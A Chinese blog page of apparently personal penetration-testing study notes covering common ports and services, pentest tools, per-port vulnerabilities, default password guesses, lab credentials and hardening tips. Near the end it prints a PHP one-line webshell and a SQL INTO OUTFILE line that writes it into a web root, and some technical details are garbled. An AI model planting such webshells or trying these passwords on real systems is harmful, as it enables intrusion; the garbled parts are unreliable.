



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CGothicG:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="网络安全" />


<link rel="canonical" href="http://example.com/2016/01/26/2016021%E5%B9%B3%E5%8F%B0%E8%AE%B0%E5%BD%953/">



  <title>
网络安全记录 |
tangerine = Hexo</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">网络安全记录
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2016-01-26 17:35:03">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2016-01-26T17:35:03+08:00">2016-01-26</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>3.3k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>3 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">tangerine</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>
      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/ab0127aa2427fa655db33a097d7e215e.md.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/2642d17296be87c670c540b75c0562b3.md.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/6a834199cae04e75c335d444704c2060.md.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/545e6f6f8db4a66e412bf2c5213d3d10.md.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/6edf0eae0c5c58dadd09198c6c3c9f6d.md.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/4c481240fd5e6e7b076ca8fe50da6e52.md.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2016/01/26/2016021%E5%B9%B3%E5%8F%B0%E8%AE%B0%E5%BD%953/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/56780814.png">
    <meta itemprop="name" content="tox">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>端口号 window 服务名称 	linux 服务名称<br>
 21	FTP		VSFTPD<br>
22	openssh		sshd<br>
23	telnet		telnet<br>
53	dns		named<br>
80	web		httpd（apache）<br>
137	rpc		rpc<br>
139	rpc		rpc	<br>
445	lanmanserver	samba<br>
1433	mssql（SQLserver）<br>
3306	mysql		mysql<br>
3389	终端 terminal 服务（RDP）</p>
<p>192.168.83.100  192.168.83.150  student01-19 123456</p>
<p>25 smtp 邮件服务器<br>
 67/68 dhcp<br>
110 pop3<br>
143 imap<br>
161/162 snmp<br>
389 diap<br>
512/513/514 rlogin<br>
873 rsync<br>
1352 lotus<br>
4848 glassfish<br>
5900 vnc<br>
6379 redis</p>
<p>window 使用的服务版本<br>
 xp=03<br>
7=08<br>
8.1=12<br>
10=16</p>
<p>linux 使用用版本<br>
 centos5.4<br>
centos6.8<br>
centos7<br>
 渗透机<br>
 ubantu6（backtrack5 R3）<br>
debian7（kali2018-6）<br>
window7</p>
<p>window 工具<br>
 zenmap  nmap - gui<br>
 中国菜刀  一句话木马连接  php<br>
wireshark  数据捕获监听<br>
 burp suite 修改数据包发送至服务器</p>
<p>bt5<br>
nmap<br>
snmpcheck<br>
fping<br>
arping<br>
python3		<br>
metasploit</p>
<p>kali<br>
nmap<br>
wireshark<br>
metasploit<br>
opencheck<br>
oshcreak<br>
burpsuite</p>
<p>信息收集类型<br>
系统渗透（window【网络共享】，linux【mysql】）<br>
python3<br>
web 方向（html，php-mysql）<br>
信息报文分析（*.pacp   *.pacpng）</p>
<p>寻找 web 地址的包。包的类型同服务名称 http</p>
<p>报文中的编码寻找信息，并且转译。</p>
<p>远程终端连接软件，putty，crt，xshell</p>
<p>centos6 与 7 的区别<br>
防火墙：<br>
6：SElinux，iptables<br>
7：firewall，selinux，iptables<br>
 服务方面：<br>
6：service httpd start<br>
/etc/init.d/server start(restart,stop)<br>
7：systemctil start() httpd.service</p>
<p>centos 与 redhat 同一内核	yum<br>
ubantu 与 debian 同一内核	sudo</p>
<p>服务名称区别<br>
系统类型	web		ssh<br>
Centos		httpd		sshd<br>
Ubantu		apache2		ssh</p>
<p>window 权限<br>
 guest 游客<br>
 user 用户<br>
 administrator（admin）管理员用户<br>
 system 系统用户</p>
<p>linux 权限用户<br>
 root 管理员<br>
系统自带用户（apache,www-data，smbuser）<br>
user 用户</p>
<p>window 系统 TTL 路径数为 128<br>
linux 系统 TTl 路径数位 64</p>
<p>linux 图形化界面		init5<br>
backtrack5 图形化界面	startx</p>
<p>linux 用户图标 #管理员 $ 用户<br>
 su 用户间切换登陆</p>
<p>常见协议<br>
 icmp  ping 包的报文     icmpflood （Ddos）ping<br>
tcp   tcp/ip 三次握手 安全<br>
 udp   广播包，只发不接受<br>
 arp   物理地址（mac）交互 arpflood arp 欺骗</p>
<p>osi 七层模型							tcp/i 四层模型<br>
应用层–程序								应用层<br>
表示层–图象								会话层<br>
会话层–交互式报文分解							传输层<br>
传输层–协议								接口层	<br>
网络层 —— 三层路由（ip）		<br>
数据链路层 —— 二层交换（mac）			<br>
物理层 —— 硬件</p>
<p>端口号	服务信息		漏洞情况<br>
 21	ftp		文件传输协议爆破 溢出 嗅探 后门<br>
爆破	弱口令密码字典爆破<br>
溢出	系统服务运行过载<br>
嗅探	探索曾保存过的信息（cookie）<br>
后门	ftp 的版本官方恶意后门（vsftpd2.3.4_backdoor）<br>
22	ssh/sftp	远程链接 密码爆破<br>
 23	telnet		远程链接 密码爆破 嗅探<br>
 25	smtp		邮件伪造（虚假邮件欺骗）<br>
53	dns		域名劫持 arp 欺骗 利用 DNS 突破防火墙<br>
 67/68   dhcp		dhcp 地址池劫持，交换路由地址池恶意占用<br>
 110 	pop3		爆破<br>
 139	rpc 		溢出远程代码执行 ms03_026 03 网络共享缓存区溢出<br>
 usermap  反向信息链接<br>
 143     imap		爆破<br>
 161/162 snmp		密码破解。信息收集、信息查询<br>
 389	idap		注入攻击（0day）<br>
512/513/514 rlogin	直接 rlogin 登陆 rlogin -h <span class="exturl" data-url="aHR0cDovL1hYWC5YWFguWFhYLlhYWA==">XXX.XXX.XXX.XXX</span> -uroot<br>
873	rsync		未授权访问<br>
 445	网络共享（samba) window<br>
ms08_067 03-xp 一次性使用漏洞<br>
 ms17_010 7-08-8-visa 使用次数无限	<br>
443     https（ssl）	证书的欺骗<br>
 1433	mssql（SQLserver）弱口令 mssql_login mssql_exec  xp_powershell<br>
1521	oracle		弱口令 内存溢出<br>
 2049 	nfs		配置不当引发内部存储溢出，导致系统损坏<br>
 3306    mysql		弱口令 直接远程链接 无密码前提下 netcat 直接登录<br>
网站 php asp<br>
5000	DB2		注入<br>
 8069	zabbix		远程命令执行<br>
 555     木马端口	蠕虫，冰河，C 语言转译的一段错误代码。可以直接 nc 链接</p>
<p>密码猜测<br>
 window<br>
mssql<br>
user：sa<br>
password:null root 123456 654321 administartor<br>
toor<br>
windows 开机密码<br>
 03 null 123456<br>
08 高难度复杂化的密码 Admin123. Passw@rd123<br>
linux<br>
123456 toor root rrrr tttt<br>
 密码复杂性没有硬性强调</p>
<p>常用软件登陆指令<br>
 ssh <span class="exturl" data-url="bWFpbHRvOnJvb3RAMTcyLjE2LjEuMQ==">root@172.16.1.1</span><br>
telnet -h <span class="exturl" data-url="aHR0cDovL1hYWC5YWFguWFhYLlhYWA==">XXX.XXX.XXX.XXX</span> -u<br>
nc -vv host port<br>
nc -l -v host port<br>
ftp 名字 @地址<br>
 mysql -h -u -p</p>
<p>window dos 常用指令<br>
 DIR 显示目录文件夹和子文件夹<br>
 XCOPY 复制文件和目录树<br>
 COPY 复制<br>
 TYPE 显示文本文件的内容<br>
 cd 跳转路径<br>
 FC 	对比文件不同<br>
 FINDSTR 文件中搜索字符串<br>
 FIND  	文件搜索<br>
 ping  	发送 icmp 包，探索信息<br>
 nbtstat 	查询对方 bios 信息<br>
 netstat 	查看网络状态<br>
 net use 	端口映射<br>
 net user 	用户查询<br>
 net start（stop）服务名称 开关服务<br>
 echo		输出<br>
 print		打印<br>
 ftp 下<br>
 get 服务器文件路径 本地路径 下载到本地<br>
 put		上传到服务器<br>
 bye（quit）	退出</p>
<p>快捷指令<br>
 gpdit.msc 	组策略<br>
 tsshutdn  	60 秒关机<br>
 services.msc	本地服务<br>
 logoff		注销命令<br>
 ronoce -p 	15 秒关机<br>
 winchat（xp）	windows 自带的聊天框</p>
<p>服务加固方式<br>
 web–webshell 删除 xss 信息过滤<br>
文件包含绑定网页信息过滤特殊信息<br>
文件上传，一般上传一句话木马过滤 php 文件上传<br>
以及过滤 PNG，JPG 文件<br>
 ftp–ftp 登陆模式两种，匿名用户，正常（特定）用户<br>
 2.3.4，在后台调用匿名用户，将匿名用户转化为特定用户<br>
 linuxftp 有权限调用 shell，多种（passwd，用户添加至管理员组）提权<br>
更改默认密码，关闭匿名用户登录。<br>
/etc/vsftpd/vsftpd.config<br>
ssh–默认密码丢失，ssh 溢出，无需密码登陆。ssh_exec<br>
sql–mssql：更改密码，安全加固<br>
 select * user，host，password from user<br>
go<br>
mysql：更改密码，限制特殊符号，防止 sql 注入<br>
 select * from user，host，password from mysql.user；<br>
samba–登陆方式两种，匿名用户，特定用户登陆<br>
仅允许匿名用户登陆，不允许特定用户登录。<br>
/etc/smb/samba.config<br>
 恶意端口–以 c 语言，PY 语言编程出现的后门。<br>
杀掉进程，再删除文件。<br>
对自身服务器 nmap 扫描 端口 1-65535</p>
<p>web 注入<br>
 sql 注入 1 or 0 =1<br>
 当真或假为真时，那么判断的结果无论如何都为真<br>
 1 and 0=1<br>
 当真和加为真时，判断结果一定为错</p>
<p>一句话木马 <?php @eval($_POST[1])?><br>
数据库中添加木马 select ‘<?php @eval($_POST[1])?>’ into outfile ‘/var/www/html/123.php’</p>

      <div class="tags">
          <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"><i class="ic i-tag"></i> 网络安全</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2024-03-29 06:30:25" itemprop="dateModified" datetime="2024-03-29T06:30:25+08:00">2024-03-29</time>
  </span>
  <span id="2016/01/26/2016021平台记录3/" class="item leancloud_visitors" data-flag-title="网络安全记录" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>tox <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2016/01/26/2016021%E5%B9%B3%E5%8F%B0%E8%AE%B0%E5%BD%953/" title="网络安全记录">http://example.com/2016/01/26/2016021平台记录3/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
    </div>
    <div class="item right">
      

  <a href="/2020/03/04/202003044.3%E5%A4%A7%E9%98%BF%E7%A6%8F%E7%9A%84%E9%9D%9E%E5%87%A1%E5%8A%9B%E9%87%8F/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;img.timelessq.com&#x2F;images&#x2F;2022&#x2F;07&#x2F;26&#x2F;545e6f6f8db4a66e412bf2c5213d3d10.md.jpg" title="2.3中国古代美术欣赏">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>2.3中国古代美术欣赏</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="tox"
      data-src="/images/56780814.png">
  <p class="name" itemprop="name">tox</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">31</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">7</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">12</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item email" data-url="bWFpbHRvOjI0OTUzNzk4NzVAcXEuY29t" title="mailto:2495379875@qq.com"><i class="ic i-envelope"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/04/08/202003044.1%E7%8E%A9%E4%B8%96%E4%B8%8D%E6%81%AD%E7%9A%84%E5%94%90%E4%BC%AF%E8%99%8E/" title="4.1玩世不恭的唐伯虎">4.1玩世不恭的唐伯虎</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/03/04/202003044.3%E5%A4%A7%E9%98%BF%E7%A6%8F%E7%9A%84%E9%9D%9E%E5%87%A1%E5%8A%9B%E9%87%8F/" title="2.3中国古代美术欣赏">2.3中国古代美术欣赏</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/03/04/202003042.3%E4%B8%AD%E5%9B%BD%E5%8F%A4%E4%BB%A3%E7%BE%8E%E6%9C%AF%E6%AC%A3%E8%B5%8F/" title="2.3中国古代美术欣赏">2.3中国古代美术欣赏</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/04/08/202003043.3%E5%8D%83%E5%8F%A4%E4%BC%A0%E8%AF%B5%E7%9A%84%E4%BA%94%E5%A4%B4%E7%89%9B)/" title="3.3千古传诵的五头牛">3.3千古传诵的五头牛</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/03/04/202003042.31%E4%BB%8E%E5%85%B5%E9%A9%AC%E4%BF%91%E5%88%B0%E8%AF%B4%E5%94%B1%E4%BF%91/" title="2.3.1从兵马俑到说唱俑">2.3.1从兵马俑到说唱俑</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/04/29/202003044.4%E9%BD%90%E7%99%BD%E7%9F%B3%E7%9A%84%E7%BA%A2%E8%8A%B1%E5%A2%A8%E5%8F%B6/" title="4.4齐白石的红花墨叶">4.4齐白石的红花墨叶</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/computer-science/" title="分类于 计算机科学">计算机科学</a>
<i class="ic i-angle-right"></i>
<a href="/categories/computer-science/note/" title="分类于 test1">test1</a>
<i class="ic i-angle-right"></i>
<a href="/categories/computer-science/note/doc/" title="分类于 doc">doc</a>
</div>

    <span><a href="/2023/07/01/computer-science/note/doc/doc/" title="test1">test1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/03/25/202003043.4%E3%80%8A%E6%B8%85%E6%98%8E%E4%B8%8A%E6%B2%B3%E5%9B%BE%E3%80%8B/" title="3.4《清明上河图》">3.4《清明上河图》</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/04/15/202003044.2%E7%94%BB%E7%AB%B9%E5%AD%90%E7%9A%84%E9%83%91%E6%9D%BF%E6%A1%A5/" title="4.2画竹子的郑板桥 郑燮">4.2画竹子的郑板桥 郑燮</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/08/01/20230801%E6%B5%8B%E8%AF%95/" title="功能测试">功能测试</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2023 – 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">tox @ tangerine</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">27k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">24 分钟</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>



  <!-- 不蒜子统计 -->
  <br/>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <div class="busuanzi_css" style="margin-top:-7.5px">
    <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv"></span>人</span>
    
    <br/>
    <span id="timeDate">载入天数...</span>
    <span id="times">载入时分秒...</span>
    <script>
        var now = new Date();
        function createtime() {
            var grt= new Date("08/01/2023 12:49:00");  //此处修改你的建站时间或者网站上线时间
            now.setTime(now.getTime()+250);
            days = (now - grt) / 1000 / 60 / 60 / 24;
            dnum = Math.floor(days);
            hours = (now - grt) / 1000 / 60 / 60 - (24 * dnum);
            hnum = Math.floor(hours);
            
            if(String(hnum).length == 1) {
                hnum = "0" + hnum;
            }
            
            minutes = (now - grt) / 1000 / 60 - (24 * 60 * dnum) - (60 * hnum);
            mnum = Math.floor(minutes);
            
            if(String(mnum).length == 1) {
                mnum = "0" + mnum;
            }
            
            seconds = (now - grt) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
            snum = Math.round(seconds);
            
            if(String(snum).length == 1) {
                snum = "0" + snum;
            }
            
            document.getElementById("timeDate").innerHTML = "本站已运行 " + dnum + " 天";
            document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " ;
        }
        
        setInterval("createtime()", 250);
    </script>
    </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2016/01/26/2016021平台记录3/',
    favicon: {
      show: "（●´3｀●）欢迎回来",
      hide: "(´Д｀)离开当前页面"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
